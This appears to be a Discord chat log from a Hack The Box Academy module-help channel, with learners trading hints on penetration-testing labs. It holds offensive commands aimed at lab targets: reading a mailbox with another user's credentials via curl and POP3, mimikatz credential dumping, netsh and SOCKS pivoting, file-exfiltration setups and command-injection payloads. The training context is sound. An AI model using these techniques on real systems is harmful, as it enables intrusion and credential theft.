#modules
Good thing I have a lot of leftovers for marking a section as complete lol
That icon looks super fancy ❤️
Can someone give some assistance as to how to grab ||Tom's rsa|| from using openssl with imap? I logged in with his creds but not sure where to go or what syntax to use after performing|| 1 LIST "" * and then 1 SELECT INBOX (INBOX). How can I find the rsa and fetch it? ||
For mail, the easiest way is to use a mail client.
will the color change?
@acoustic owl ...like a graphical interface version instead of the openssl one
yea
hacktricks commands
you can also use pop3
you dont need the encrypted protocol
curl -k 'imaps://<IP>/INBOX;MAILINDEX=1' --user tom:<tom's password>
you enumerate before and you will see he only has 1 mail
with pop3 you can do it from telnet
root@kali:~# telnet $ip 110
+OK beta POP3 server (JAMES POP3 Server 2.3.2) ready
USER billydean <<-- in our case 'tom'
+OK
PASS password <<-- tom's password
+OK Welcome billydean
list <<-- this is a pop command
+OK 2 1807
1 786
2 1021
retr 1 <<-- another pop command
+OK Message follows
From: jamesbrown@motown.com
Dear Billy Dean,
Here is your login for remote desktop ... try not to forget it this time!
username: billydean
password: PA$$W0RD!Z
of course you can use ports 993 and 995 for the encrypted versions of the protocols but you don't have to
mail clients are just sending these commands underneath
@sly dome cool - ty
any time
@sly dome once in via like ssh...am i looking for the HTB user? Right now i see some sql stuff and all, but nothing too useful, but wondering if i need to log into sql somehow
hello everyone, any hint for a dictionary in the Service Authentication Brute Forcing exercises?
What have you tried, provide context, we should be able to look at your question and not have any questions to ask back.
Take a look back at the previous section (Personalized Wordlists). You're trying to brute b.gates, so use cupp to generate a list with information based on Bill/William.
I did already, this is the current dictionary I'm using to attack ssh service
is it going through the list or is it just failing to connect?
because I'm pretty sure that is on a different port than the normal 22
no, no, it's going thru the list, but it's taking so long....
I know BF takes time, but you know this is an exercise, I guess it shouldn't be taking so long...
Yea, I remember the mutated passwords one took forever too, I don't remember this one taking that long though
After finishing the Advanced XSS and CSRF module, how would you further develop your knowledge base? Research papers?
send me a PM if you need help. It shouldn't take more than 5 minutes, I just ran it again and got it. Also, I know the lessons say use -t 4, but there isn't any configuration limit on the box
https://owasp.org/www-project-juice-shop/ has both and is a pretty recognized resource
I haven't been through that module yet though, so juice shop might be too low level. But it is at least more practice
Oh I've destroyed the Juice Shop a while ago
and I've done most labs I could find
I'm looking for more advanced stuff
Can't help you there then hah
which module was that
@sly dome nvm i actually got it...was tricky how lol
didn't expect the end to be that
what is this o.O just popped up for me as well 10/30 and is a "point" a cube?
not sure
I think it's just another way to gamify the process
I just answered another question with 1 cube, gave me 10 points
Probably, but do we get something :D?
Probably not
ayo gib some cubes
I need cubes for the Tier III modules pls
Prob just gonna get plat sub
I am trying to run either this|| dig txt ww02.inlanefreight.htb @10.129.73.94|| or the zone with the www1 to try and read the TXT file but I get nothing returned. this whole module has been crap. I added the IP of the target and the domains to etc hosts, too and nothing...any advice here on how to read the TXT?
even when i run export TARGET - i get server can't find ww02 or www1
Perhaps you can't view those zones, try others
@fathom pendant ok let me retry that
I am redoing the Footprinting Hard Lab and I can not find the t** password, I remember it being in the user's history file once you accessed the server with the private key.
nope, try snmp enum
@fathom pendant question: can I just perform the dig txt or is it better to run the export then nslookup TARGET one? Also...do I keep having to put the domains found in etc/hosts or not really?
Not really you can do dig query subdomain.inlanefreight.htb @ip
any idea on what im doing wrong to upgrade the meterpreter shell in the getting started knowledge check portion
why would you upgrade a meterpreter shell
trying to run the next command to elevate to admin but cant without sudo
i dont know lol but it appears i would need to, no?
to get sudo to work?
hardening your shell isn't going to get you privesc, go double check the section content
you dont need to upgrade your meterpreter shell. You just need to drop into a regular shell
view the meterpreter help info
i tried the shell command to drop into a system command shell but by that screenshot it like crapped out a bit
Now type 'whoami'
ohhhhhhhhhhhhh
Yeeeee
dont walk them through the rest
the issue was solved, let them figure the rest out
lol gotcha gotcha
im trying to figure out that next part after that myself lol
i see where i can run the content but confused on where to go from here myself

done, I sent a PM
Why are you making pics of your screen
When you can just make a screenshot and send that
lol thats a good question my bad
Evening all, just doing the Miscellaneous Technique task under the Windows Privilege Escalations. I've found 3 passwords none of which appear to work, would anyone be so kind enough to point me in the right direction please TIA
It's just a different tool that's used on Windows
is htb down again ?
Don't believe so I'm on it at the moment
huh i cant spawn targets nor pwnboxes
Yeah same here
Ah OK, just refresh everything and you are correct in that I now can't spawn a target
@languid fjord
What module
I can't spawn a session or box either
yeah seems like targets are dead
poked the infra team
Thanks
getting started knowledge check - i think i have to run some command somehow to append the php file but im a bit lost. is my goal to upload a new php file altogether and run it to create a reverse shell? or is it something else? i cant edit php itself
works again
Use gtfobins
You can run php with sudo privileges
Search how can you leverage it to gain a shell as root
targets? pwnbox? both?
Target at least, let me check pwnbox
kk, ty
works as well.
interesting, doesnt work for me still
I tried to footprint the DNS and find the one that ends in 203. I used dnsenum with all the discovery txt files and found nothing. What I am missing?
Did you use the fierce wordlist? And did you do it against the right subdomain
I did, but need to check the subdomain part.
Do a zone transfer to the domain first to be sure you get all the subdomains
which servers are you on ooc? @wet kite @slender shoal
hello,
i'm trying the password attack module and i got this error when i try running pypykatz
You should probably be running pypykatz on the target
it's a windows target without pypykatz on it
i'm supposed to import the lsass dump and use pypykatz on the dump but i got this error
I did try recursion on subdomains, but that did not work.
Dnsenum doesn't catch all the original subdomains
That's why I said you need to query for them first
oh.. mimikatz works the same way ?
its up now
.... look at their names and think critically
Mimikatz = windows, pypykatz = domain joined linux
oh thx
Most of the time on windows targets they'll have the tools, if intended, in C:\tools
With lsass you can use secretsdump.py
in ctfs, does failing an educated bruteforce for massive wordlists usually mean that the login page isnt the concern and something more obscure is
It could be
wut does experience tell u
I dont participate in ctfs, and this channel really isn't for conversation about ctfs
And I'm telling you that this channel isn't for that conversation
How about you actually stay on topic
youre already verified so you have no excuse, you can see all the channels
A third-party outage is causing some intermittent issues with spawning. We are currently investigating the problem.
@languid fjord is this counting towards cpts exam takers? Because my lab is not redeploying
You will be compensated time lost on the exam due to technical issues
Please contact customer support, and they will make it right
has been like 3 days with these problems, will they be fixed?
Unfortunately, as i said earlier, the issue is caused by a third-party, we are doing what we can in this situation
i understand
hope tomorrow it is fixed
i lost 2 days because whenever i try to study some module there is an outage
can anyone help me with command injection skill assessment? I've managed to get the location of flag.txt and used a payload to move the flag to the tmp folder, but it gave me 'access denied', then I used the same payload on copying but it gave me this error instead: Error while copying from tmp/51459716.txt${LS_COLOR:10:1} ${PATH:0:1}flag.txt to 51459716.txt${LS_COLOR:10:1} ${PATH:0:1}flag.txt, can someone help me with this? thx!
hi I am trying to use DNS lists on seclists with nmap using dns-brute and its not working. would a zone transfer work better? this is for last section of enumeration with nmap? should I rely on zone transfers or brute forcing?
I'm assuming its one of those two because those are my two remaining options
am I wrong about this?
Try a different tool
I've been spawning a target for questions for about 15 min now. Is anyone else having problems?
same
But also i don't think that's the answer
ok
me too
so I can do everything I need with nmap?
@manic terrace and @bright quiver guys read what Emma said just 10 answers above yours, they are having issues with a 3rd party package... it's literally bolded.
do I need to transition to another tool or should I focus on DNS with Nmap
The hard lab?
Reread the dns proxy section
ok
where's the dns proxy section?
I am looking in the nmap module and going through several sections
Under firewall IDS/IPS evasion
ok cool
Instead of using their known port use -p-
I solved it
it took I while to figure out
I'm so proud lmao this took a LONG time
the answer turned out to be much simpler than I thought
can someone help me with this?
Why did you move it to tmp? I don't remember the module, but you need to escape from the 'mv' command to your own command.
why not just cat it
What was your payload?
I've just done the module
was it related to dns proxying? I'm just struggling with the same challenge lol
they have filtered space and some tools, you could still use base64, bash, other operators
yes it was
read that subsection under IDS/IPS firewall evasion section
just replace their exact scan with a -p- scan
yeah I just found it, indeed, you have everything you need to pass the challenge on that section
thanks for the guidance
could use a nudge on Attacking Common Services - Easy
Gonna need more context chief otherwise I'll just tell you to turn it on 
just trying to figure out the other way of getting the flag 
oh
¯\_(ツ)_/¯
probably a reverse shell or something
I'm pretty sure it's like 90% the same steps then the last 10% you can do a couple things- i never looked into it tbh
no. its something else. Its easier than you'd think. I was overthinking it for a long time. you have to know the right protocol to attack then you have to kind of figure it out
its difficult I know
its something I struggled with for a while
@quaint hemlock search the forums dude.
Heya, Anyone have an issue when starting a Machine, that its up, can ping it but nmap shows no ports/services. I know from the lab ithere should be a SQL server running but nada. I tried to stop, restart the machine but I get an error. So I logged out and back in. Any ideas?
there's an ongoing issue
nods
hey guys i am 99,5% from cpts path and i am stuck on the Attacking Thick Client Applications, Skills Assessment III from ATTACKING COMMON APPLICATIONS anyone can i dm for help?
look up the walkthrough for the retired box "fatty"
iirc that's what that's about
Attacking web client thick applications
Doesnt matter
a segment of fatty is LITERALLY that section
watch ippsec's video on it
The button for fatty jar is not showing up after I updated it
Can't read the notes text
would ya look at that
Read my suggestion to look up the retired machine "fatty" that should help you, maybe you missed a step
Thanks I'll take a look at it . The pivot api video helped me
i've seen others get tripped up on the same thing so I don't think it's necessarily JUST you
(That section literally is just thrown in out of nowhere)
it was hard.
I've read everyone's frustration
Very. Very. Very. difficult.
note: "Fatty" was labeled as an "Insane" Box
^ because it makes you go insane
i mean the spec for box difficulty is generally the number of steps ¯\_(ツ)_/¯
Hey everyone, I have some troubles.
I saved 500 cubes and have 3 options for which module to choose, but I have no idea which one to choose.
Can someone help me with it?
Modules:
Kerberos Attacks (tier 3)
Using CrackMapExec (tier 3)
Active Directory Bloodhound (tier 3)
100% Kerberos Attacks, the other two you could learn on your own
I agree.

Yes
Hi all, I am stuck at Credential Hunting in Linux. I'm having issues running lazagne on the target's machine. I successfully gained an initial foothold and am now attempting to gain Will's password. Note: I transferred the zipped file.
Did you end up figuring this one out? I'm running into the same issues
Have you uploaded the whole zip file or just a part of it?
The whole zip file
hi
Anyone already done Shells & Payloads live engagement? i have some questions
Hello, im currently doing the "getting started" module and in the "basic Tools" section i tried to answer the Question, but the flag i answered seems to be false,
did i forgot something?
yes, the port
where to with some minor tweak suggestion? in the module changelog the link when clicking on one of them is "/module/XY" which, for locked modules, will just show the "Unlock for XX" page. instead the link should go to "/module/details/XY" which actually gives information about the module, and one can unlock after reading what's in the module
this is more suitable to be done via the support in the website
uhm.... need a howto for the chatbot, how do i actually comment here?^^ it just closes the chat after telling me to comment
Hello sir. Could we go in DMs ?
hi im new! which is the channel for super newbie questions?
Read and follow #welcome
then you will see all channels
Hi!! Can someone help me with this? I'm trying to connect to a MSSQL server... (doing AD Enumeration & Attacks - Skills Assessment Part II - Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host. )
Is your PC in the 172.16.7.x network?
Yes
And there's a port in the IP for Mssql service
Using impacket lead to the same error
Hey yo beautiful people
I am stuck at AD Enumeration & Attacks - Skills Assessment Part II
Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host.
I am local admin on SQL01, enumerated like a maniac but can't move anywhere
Yes, the whole zip file. It gives some error about the psutil module
Inveigh, mimikatz, LaZagne, manual enumeration, ACLs
what can you do with your admin creds, whats a common administrator password usage flaw in a network...
I don't have creds for my admin user, I priv esc'd with something else
also, that super long password... I used crackmapexec to password spray, as well as kerbrute, it didn't lead me anywhere
It should work, but you could also play with metasploit for that, there is a post exploitation module that does the exact same thing, thats what I used.
thats a spoiler btw
But I believe you have answered yourself
damn sorry, spoiler removed
hello everyone, I'm in the SQL injection fundamentals and I had to use a specific command to bypass authentication. My question is: is there a way to know which command in the list on PayloadsAllTheThings is gonna work or it's just literally trial and error until one works?
Know what to do now yeah?
I am assuming... I thought that same exploit would work only with service accounts... let me go back and try
I have searched through my notes. I accessed the database from the host ||skills-par01|| with ||mssqlclient.py||
common administrator password flaw. - Hint
oh my, I see now
thank you heaps for this!!
HTB profile for some creds? @faint rampart
dms?
sure
can i DM you?
sure
@acoustic owl Could we go in Dms for some questions ?
anyone have an idea why i keep getting this
nslookup -query=a 10.129.73.220
Server: 1.1.1.1
Address: 1.1.1.1#53
** server can't find 220.73.129.10.in-addr.arpa: NXDOMAIN
kerberos module: unconstrained delegation users challenge. followed the steps and have the DC ccache but keep getting this response from secrets dump
[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[*] Cleaning up...
have re-imported the ccache as well as tried again from the start and the same issue. I mean I have the tgt for the DC so unsure why secretsdump isn't working
fixed, hosts file wasn't resolving the DC for some reason, had to specify the DC ip manually
can anyone assist with this question? What is the FQDN of the IP address 10.10.34.136?
I ran this but I do not see the IP ||dig @10.129.73.220 NS axfr inlanefreight.htb|| or FQDN show up?
Remember a DNS lookup maps a hostname to an IP address, you're looking to do the reverse (that's a hint). The module should have an example of doing that exact thing if you're really stuck.
anyone run into issues where when trying to run this command:|| curl http://10.129.73.220 -H "Host: www.inlanefreight.htb"|| - it just disappears? I am trying to do the virtual host exercise
what happens when you hit 30 in streak?
hehe ok
You should stop learning right now lol
Sweet!
Read 3 modules, mark as completed There we go, done for the week!
Oh, then you study for CPTS for two - three years lol
Hope you take good notes
No, my notes are honestly not good. But I'm working on it 
Better luck next year!
Hi got a question for you guys. I am at the Attacking common services assessment module medium and I am trying to bruteforce my way into the FTP. what i would like to know is which pw list and user list you used for that challenge?
And 1 extra year for report writing
With the new tool, this should be quick and easy.
Yeah, have not tried it yet hopefully this Sunday
I haven't tried it yet either
But I should definitely do it. Because I actually want to use it for the CDSA exam
Is there a way to reset academy modules to do them again, or is it just "go back and review" it type deal? I feel like I'm not quite retaining the info as much as I should be and would like to do it again. There is a retake module button. I am dumb, ignore this.
@next bronze footprint
any hint on how to find HTB password on footprinting hard lab? i really did everything and got the ssh private key and logged in as Tom
still no HTB password to be seen
enum the machine
ports, files etc
hi
HEllo
still struggling
searched for hidden files but nothing intresting
taken a look at history?
saw a mysql command yes
but i don't have the password
Sure about that?
waitt ....
wait wait
i think i have
lmaoooo
Have fun buddy. XD
completely forgot about it hhaha
a better approach was enumerating ports
in real environments you wont find a command history
(likely)
I agree.
It was a second hint hehe.
I agree, but the fact of its existence is hint to an internally running service even tho its content should typically be redirected to devnull
netstat -tulnpa
ss
does it matter? i mean rethink your question
you just have command execution, does not matter the how
yeah, net-tools package isnt always installed.
when i enumerate port 3306 for mysql its says closed?
please be more concise
i used nmap to scan the target IP on port 3306 which is the sql port and it's says its closed
yeah but how can u know that it's can be opened from the inside
ss -lntp
is a basic command when enumerating a unix machine
those you saw on nmap are the ones open to 0.0.0.0
when i use it my ssh sessions crashes lol
very weird
i will try running it again wait
maybe a RAM problem?
or does it take time to execute that command?
no xD
:3
Have you tried netstat
Yw
can i DM you ( im at the same point)?
Since i allocated only 7gb ram?
Can a slow internet cause that problem?
I agree
Hi, I am currently doing the IDS avoidance with nmap and I noticed in one of the labs you can only get a connection to a certain port when the source port is an allowed port. So I am using --source-port [port] but then when I do -sV or anything using NSE, it's not using the source port, just a random one. I used --packet-trace to get that info.
are you using --source-port= ?
Hi everyone! Recently I discovered a vulnerability in my company's website. However, I don't know the best way to report it without causing problems for myself. What should I do?
Are you running with sudo or as root?
but also it highly depends on the type of scan
How did you discover the vulnerability, just report it to IT
your company probably has some sort of reporting process
just --source-port [port] works too
thx
Tested that one too just to be sure, but it's not working either
In Linux Fundamentals > File System Management, Question is How many disks exist in our Pwnbox? The answer should be 1 as shown in screenshot, rather than 3.
Not sure why the copy and paste not working for screenshot
Read and follow #welcome
So excited to study and the boxes are not working. Slamming my keyboard.. 500€ for this (:
Errors sometimes occur on the best servers.
@acoustic owl I dont like that I pay first of all 500€ to use the modules, I understand even AWS/Azure have problems but 5 days?
Also, second thing im fucked about is the lie that the CBBH exam would be corrected in 20 days, its been 30 days
There is only 1 disk and 3 partitions.
The best thing to do is to contact support, as Earthbuffet has already told you. There is nothing we can do here in both cases
It is 20 business days. Slightly different but affects the timeline quite a bit.
But, they do provide good feedback which is a huge win and tells you what to improve on even if you pass.
Yes of course, that is why im doing these exams because everyone said they are giving nice feedback and I can use it to actually be better at reporting. But honestly, after 1month you kind of lose motivation if there is no response
Sometimes you just wanna blow off some steam, and when there is no response on exam + PWNBOX down, then one can only have so much patience
If it truly has been that long I would contact support (usually pretty fast response) and if it was mid exam definitely reach out to support.
I can understand you. Nevertheless, please be patient.
The guys are very busy at the moment. That's why it's taking longer than normal.
Does anyone has an answer for this? I also tried with --source-port= but it's the same thing. it's for the Enumeration with NMap module, final lab.
Try it in the PwnBox, not from your VM
do it with sudo
ran with it already
why would it change how nmap works? I am using parrot with the latest updates. I'll give it a try anyways
If I am not mistaken, then it is not a problem with nmap, but with the VPN. Try it from the PwnBox.
it really seems to be coming from nmap, when using --packet-trace I can see the initiating port. it's 53 for the port scan but some random port when it's NSE.
I just tried and got the same result with PwnBox.
ls
Send me your command in a PM. Then I'll take a look at it.
If you have lost exam time due to technical issues on their side, you must contact support, they will credit you the time back
If it is one of the questions where you have to get the service banner try a different command mentioned in the module.
Exactly -- It's like HTB is wanting to punish those who truly pushed hard on Academy... I've got 89 of 96 module completion badges...
its 30 points. not answers
30 answers per week is quite the ask
Yeah, but when there are physically only 7 modules which I have not completed, it's very restricting on what I have to choose from...
yeah I get that haha, just was stating its different
For Windows Privilege Escalation - Pillaging: I need to get a cookie to log into the slack website, but I can't figure a way to transfer the cookies.sqlite db to my main machine, unless theres a different way? S:
Don't remember that specific module, but for file transfer from windows to linux my fave is if I have RDP use the /drive option on xfreerdp, failing that an SMB share is my next go-to
I am running nmap -sV but receiving "1 service unrecognized despite returning data." for the only port that I need
I tried doing smb but you need admin password afaik, I don't see an option for the /drive on xfreerdp?
wrt smb -- you can host an smb share on your linux box, and then copy from windows to your linux smb share. but if you have rdp, I usually do: /drive:test,/tmp -- where it creates a 'test' folder on windows that maps to the /tmp folder on linux
would that still work even though the VM has no internet access?
If the VM has no connectivity, how are you connecting to it? If you're able to connect to it, it's got to have connectivity... Again, I'm going blind -- while I've done the windows priv esc module, it was a long time ago -- just giving generalized advice
through RDP, this whole section has me a little confused, I have to transfer a cookies.sqlite db to it, I thought I could just do some basic upload stuff then I realised it has 0 internet access
and are you RDP'ing from a Linux or Windows host?
Linux
atm I'm using remmina to RDP into it
I know nothing about remmina. Just xfreerdp.
it acts similar to xfreerdp but its just a GUI instead of a command line
xfreerdp /v:IPADDR /u:USERNAME /p:PASS /drive:test,/tmp
thank you <3
it worked perfectly, thank you so much! :)
don't forget /dynamic-resolution
almost added it, but was trying to avoid detracting from the key focus, which was how to xfer a file -- but yes, absolutely spot-on
I honestly muscle memory it at this point lol
small question, I've got the password hash for the local admin, but I cant figure out "what" part is the actual hash, its the 2nd part right?
woops
I believe one of the sections goes over the parts of it
NT and LM hashes separated by :, but which is which?
that's evil
it just says "Submit the Administrator hash as the answer." but I'm not sure if they want the entire hash or a specific part, none of them seem to be working for me : (
what exercise is this again?
Pillaging
i just checked my notes an ntlm hash is structured as [LM]:[NT]
uuuh I haven't done that one
its the last question for that section, I've obtained the SAM and SYSTEM files required, dumped the hashes but I'm unsure what formatting they want :l
Haven't done PTH in ages D:
then refer to your notes
i'm still curious about the rewards tbh
i would answer this, but if you google this question it's literally the first result
same here! I wonder how many weeks it takes....
Its fine I solved it, I realised there was two different backups which both had two different hashes..
and I wonder if I can horde answers and just submit them weekly
That's just stupid tbh
I'd rather just complete it
There's definitely enough content on the site
No
for the weeks when I can't study
It's still stupid
Farming rewards on a hacker's training platform, yeah I agree it is stupid
BTW how do they assign points? When I solved a 1 cube exercise I felt like I got more than 1 point
¯\_(ツ)_/¯
Probably a test of the feature since no announcement about the feature
uuuh so there was no announcement, I thought I missed it as I was glued to CPTS
It's still very beta and we're working things out
It would have been nice to have a beta rollout announcement but if there's a helpdesk article for it to point to that'd also be nice
I'll note it for the team
I dont think the pwnbox server thing on academy was announced either, but I might have missed it
hello, I have a question regarding the Linux Fundamentals module, is this the right place to ask for help?
basically Im trying to install docker in my Pwnbox but it seems to have no internet connection
You're not gonna be able to access internet in pwnbox
It's extremely limited
You don't need to set up a docker container at all
cant even apt-get install docker?
You're not required to set up a docker instance
I know I know, I just wanted to test the bash script given by the lesson https://academy.hackthebox.com/module/18/section/2097
If you want to, you're better off using your own vm
thanks for the heads up @fathom pendant
Anyone else unable to connect to Academy vpn?
no, but everytime i try to use the accesschk tool it kills my network on my vm in the module im doing
so im obviously doing something wrong strill
still
@_@
hello y'all, anyone receive this message in the last question into Brute Forcing - Service Login :
ftp> get flag
local: flag remote: flag
local: flag: Permission denied
You're running ftp from a directory you don't have write access to
hmm.... lemme double check
Hello everyone. I'm working on the SQLMap Essentials, Attack tuning. I'm pretty sure I have the flag5, but it keeps telling me its not right. At first I wasn't connected to the vpn and didn't realize it. which on it's own is weird because i was able to connect to the db, the website and everything. I got a screen-shot but I'm not sure how to cover up the spoilers.
Just don't include the flag at all in your post, as it's still a spoiler, you can go into a software like paint and block out everything between {}
can I dm you the flag?
I haven't done this module
oh ok.
I don't come in here much, but when I have I think I always see u. So i thought you were.......tech support. lol jk
Any chance of a nudge for Credential Hunting in Linux in the Password Attacks Module? I've been at this for two days now and I can't seem to get ahold of what they're looking for...
I've just cracked the password for a totally different challenge on the same box and I'm beginning to get confused.
you can try to check the password stored in the browser
firefox_decrypt.py is helpful
Interesting. I thought I had been by that but I imagine I brushed by it without spending enough time. Thanks for the tip!
enjoy your module, bro!
Could anyone tell me why I can't login to htb-student with IP:172.16..5.225 in https://academy.hackthebox.com/module/143/section/1489 ?
I'm working on the Pivoting Tunneling and Port Forwarding skills assessment. I've RDP into the first pivot host on domain 172.15.5.x
I found user v***** but can't find a way to get his credentials. I can find mimikatz on the host, can't get it on the host, tried attacking lsass and Sam, tried looking for files that have the users passwords in either plaintext or hash. I can find nothing. Is there something I'm missing?
Because you're not supposed to SSH, you're supposed to RDP to the target and then do what the questions ask you to do, which none of them involves interacting via SSH with this target.
really ?
RDP to 10.129.201.234 with user "htb-student" and password "Academy_student_AD!"
Have you read it ? ))
maybe you can use mimikatz for this case
mimikatz # sekurlsa::minidump C:\Users\<m*_user_here>\AppData\Local\Temp\lsass.DMP
mimikatz # sekurlsa::logonpasswords
In which module is this snippet?
ACTIVE DIRECTORY ENUMERATION & ATTACKS
But I don't see mimikatz.exe on the host
Website support isn't on the discord
C:\tools
you can transfer the mimikatz tool to the target machine, bro
No such directory
Then do what satellite said, transfer file
transfering your tool to the target machine
I tried, but maybe I just couldn't get the transfer right, so I thought that wasn't what I was supposed to do
Already found it, wait a sec i'm trying to connect via SSH here
I'll try that again more carefully
this is a transfer file guide for you:
Steps to transfer files from windows to linux.
1 - Install pyftpdlib in our linux machine > pip install pyftpdlib
2 - Create a directory in the linux machine > mkdir files_from_windows
3 - Start the FTP server by specifying the dir_name and allowing write permissions > python3 -m pyftpdlib -d files_from_windows -w
4 - Navigate to the windows quickaccess pane and search for the ftp server > ftp://10.10.14.75:2121/
5 - Copy and paste the needed files to the folder.
and another way with xfreerdp
xfreerdp /u:<username> /p:<password> /v:<IP> /drive:data,/tmp /dynamic-resolution
I have my files hosted on a local nginx server 10/10
for your case, you can use xfreerdp
yes, and on the Windows machine, we can access our attack's IP machine and get the file. @pure sorrel
I need to beef up my nginx server to make it cooler
HTB is refusing to give me a box for the AD Skill Assessment part II
can I vent here?
They're currently having issues since like last week
Some backend 3rd party stuff
It's been intermittent and being looked into
the platform is pulling my leg, it gives me box for the part I but not for part II 
Thanks btw, I'll be more patient
I used xfreerdp with the shared drive, I must have just had bad syntax, it's been a long day
Thanks for your help
xfreerdp way will be like this, and you can transfer any files to the Windows machine from your kali/parrot via a new drive @pure sorrel
Bash is clear
yes, sadly I do cls on bash and clear on cmd/powershell, always get it wrong the first time
Yea I used it earlier today for another module, so I must have just carelessly done it wrong
to transfer files I go with the long way:
python3 -m http.server 8000 is going to open a quick http server on that specified port, in the same folder you are running the command
I needed to type password word by word ))
alias cls=clear
Probably didn't copy it properly
I think you can actually use secretsdump.py from your own VM, but i'm not sure
Only if you have a pivot through the network
Or if you transfer files back
yes, file transfer is a core technique, anyway, we can do it according to our situation accordingly
Yea, I'm not sure how I did it at the time but I think I used what was shown on port forwarding with Windows netsh. Either this or the technique with chisel
@pure sorrel Dante & Zephyr are cool and friendly for you to practice the Pivoting technique, Offshore you will master this technique lol
Look into ligolo-ng
I'm going to add those to my list. Trying to finish the pentester path first, then get into some boxes
@marble raft for the Skill Assessment of the AD Enumeration & Attack module:
On the Foothold machine, you can use Netsh tool to forward port:
PS C:\> netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=<foothold_IP> connectport=3389 connectaddress=<Connect_IP>
and then you can RDP to the Connect_IP
xfreerdp /v:<foothold_IP>:8080 /u:<username> /p:<password>
Have a question for the group. Been working on Q8 of the AD Enumeration & Attacks - Skills Assessment Part II for the last few days. I got SYSTEM on SQL01 and got the admin hash so I can WinRM into SQL01 now. I have 2 users that can RDP into MS01 but am having a difficult time trying to get to admin on that box. Any hints would be appreciated. I've been doing these skills assessments for what feels like weeks now
To add on that: completely unrelated, but another technique:
ssh -D 9050 username@ip to ssh into the foothold, the -D enables dynamic port forwarding on port 9050, then you change your /etc/proxychains.conf file to include the line 127.0.0.1 9050 and use xfreerdp as proxychains -q xfreerdp /v:<foothold_IP>:8080 /u:<username> /p:<password>
is this the correct channel for help?
for module help, yes.
when I run nmap -sV, the version of the service running on the specific port I need is not shown, but all others are shown
however, it does say "1 service unrecognized despite running data."
which module and section?
well, shit, my VM froze
the module is Getting Started. the section is Service Scanning
im on the zap scanner module of using web proxies, and it says "once you find the high level vulnerability". ive generated a report with the active scanner however no high level vulnerabilities show up - only medium and low. i also tried the regular zap spider but to no avail.
Can you dm me with more details? @heady estuary
@slender shoal I used the Pwnbox and it worked. it wasn't working on my VM. which is still odd... but thank you
Good stuff
is this common with HTB?
i generally dont have those issues
mmmh more common than I'd like it to be, but realistically 1 in every 15 exercises in the CBBH Path will give you that issue
sorry does anyone know anything about this
what module is that?
I don't think I have done anything with zap
@rotund crater okay thank you. good to know.
Ok let me check my notes
and my HUD in the zap browser is gone and idk how to bring it back
ok i just restarted session and the HUD is back nevermind
Are you doing that from your own kali or from the pwnbox?
my own laptop
I have no notes for this, it probably pissed me off lol
uhm try switching to the pwnbox, I think this is what happened
Zap and I are not friends anymore, now Burp is my friend
ZAP is a bit funky, but it looks like you just need to follow the section pretty closely
yeah i like burp more definitely
i did except without using the HUD, didnt think that would change anything
the HUD doesnt work at all in the pwnbox and im getting the exact same output as i am on my laptop. i just wanna go hooomeee
now im just too upset to continue
i followed the module word for word in a new untouched pwnbox and it didnt work
Any able to help me with the DNS section of foot printing please? Can't make sense of the first question
Interact with the target DNS using its IP address and enumerate the FQDN of it for the "inlanefreight.htb" domain. - Not sure what they're asking for exactly, no flags found when interacting
I get that, but there's an answer box
Yes
dig inlanefreight.htb @10.129.14.128
The answer is in the form of a Fully Qualified Domain Name
Not a flag
Not every answer in academy is gonna be in the format of a flag
I know
I have, and got the zone transfer flag
You're likely overlooking the answer
its on his screen im sure
cute
It's just a fundamental misunderstanding of what fqdn means
No no you misunderstand, maybe I did a poor job of explaining my predicament
I didn't understand what the question was asking of me
And I explained it to you
If you're really unsure of what a fqdn is, Google is free
i sense some tension guys
I'm not unsure of what fqdn is
I can only lead you so far to the answer
You didn't lead me at all because you misunderstood lmao
No. I figured that expanding the acronym might help you further understand.
Nah, I just didn't understand what the question wanted in terms of an answer, I answered the other questions just wasn't sure what they were after for this one
Use ctrl+f to search for fqdn on that section, it does explain it on the page
Albeit briefly
Can I ask if there is anyone besides me doing the Active directory module in CPTS that have problem with VPN connections?
They've been having backend issues lately
I find it strange other ppl can do modules though
I RDP and after 30 sec it closes down
try to regen your vpn and ensure its a tcp vpn pack that might also solve some of your issues
Actually smart suggestion, only used UDP. Will give it a try
Good morning everyone - is anyone able to help me with Enumerating AD users? I am trying to use the Find-ForeignGroup SharpView command but getting no output. That is the command given to us in the module
Nevermind I got it, that is not the command you need. For the next homie: Just look for administrators.
Hey, is there anyone in the support team who can help me troubleshoot why i cant access my ProLabs that i just bought?
Contacting support on the platform is the best bet: https://help.hackthebox.com/en/articles/5986762-contacting-htb-support
Need to speak to a person? Learn how to reach our support via HTB Labs.
Great thanks
Make sure you're using the correct vpn key, I haven't bought prolabs but I'm assuming they have a different key as they do for VIP, academy, and seasonal
The problem is that it says "Failed to find a valid ProLab Rasta VPN Server"
And i cant download the Ovpn file in order to initiate a vpn connection
Its greyed out
It's the same error on all lab environments. I've contacted support. Hopefully I'll get a response
hey guys can i learn binary exploitation and reverse engineering from HTB ?
Maybe with something like that
There is a track on main HTB platform that has machine listed that can help you practice BE
Guys, I have a question regarding target Global IP discovery. How do I find that?
you need vip access 15$ i guess
Let's keep this chat on-topic to htb modules
sure
If you're referring to the modules that payloadbunny linked: you'll need to buy the cubes for them, if you're looking for binary exploitation related boxes or challenges - you'll need vip on the main platform to access any retired content, academy and labs are separate platforms
for the attacking web applications with ffuf. I ran my recursive scan for academy.htb like it directed found the admin subdomain. How do I actually find the ip for this subdomain to add it to my /etc/hosts file so I can perform other scans?
I notice in the module Parameter Fuzzing - GET it has us going after that subdomain but it never added it to the hosts file even though it's on a separate IP
Hi!! I have a question. Doing this type of download can lose bytes of the file? Because the size is not the same... and how can u do it without losing data?
Win-Rm is finicky
But we don't have a better tool
If the md5sum is the same then there's no actual data loss
It's just how the filesystem displays data
i am trying to run this : ||scp htb-student/upload_nix.txt htb-ac-814020@10.10.14.189:/home/|| - but when trying to download it times out - any thoughts here? it is for the linux file transfer portion
if anyone here have done the password attacks module and have a minute for a chat, please let me know if i can dm you. im stuck af and i have an idea of what i can do but i dont want to spend another day if im not pulling on the right direction
sure
anyone help with the above?
if u guys done @sly kelp may I dm u as well? stuck as well with the Password attacks module kek
sure I can try my best to help you guys
thanks thanks
unable to message anyways the question is finding the flag since,
i've cracked 3 users already using "crackmapexec --shares"
using smbclient i've already accessed the smb service but unable to locate the flag since there is no file in the following shares
can you try smbmap as well
look at the Permissions
